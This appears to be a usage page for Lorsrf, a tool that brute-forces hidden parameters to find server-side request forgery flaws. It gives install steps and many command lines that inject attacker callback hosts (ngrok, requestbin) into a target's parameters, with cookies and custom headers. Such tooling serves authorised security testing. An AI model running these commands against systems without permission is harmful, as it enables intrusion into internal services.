Lorsrf has been added to scant3r with useful additions (multi http method , multi content-type (json , query , xml , speed , large worlist and more)). Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods


  • download it

➜ git clone https://github.com/knassar702/lorsrf
➜ cd lorsrf
➜ sudo pip3 install requests flask

install ngrok tool



  • run your ngrok ./ngrok http 9090
  • run server.py script and add ngrok port python3 server.py 9090
  • run lorsrf.py and add ngrok host using -s option


  • login to https://requestbin.com
  • copy your host and add it by using -s option (without server.py file)

How can i use it .?

cat YOUR_LIST.txt | python3 lorsrf.py -t URL_TARGET -s YOUR_HOST -w wordlist.txt


$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io

add threads

$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io –threads=50

add timeout

$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io —timeout=4

add cookies

$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -c ‘user=5&PHPSESSION=5232’

add headers from text file

$cat headers.txt
Cookie: test=1
Auth: Basic TG9yU3JmCg==
$cat parameters.txt | python3 lorsrf.py -f headers.txt -s ‘http://myhost.com’ -t ‘http://ssrf.hack.com’
GET /?parameter={YOUR_HOST} HTTP/1.1
Host: targer.com
Cookie: test=1
Auth: Basic TG9yU3JmCg==

Follow redirects

$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -r


python3 lorsrf.py -t ‘http://testphp.vulnweb.com/showimage.php’ -s ‘https://YOUR_HOST.com’ -w parameters.txt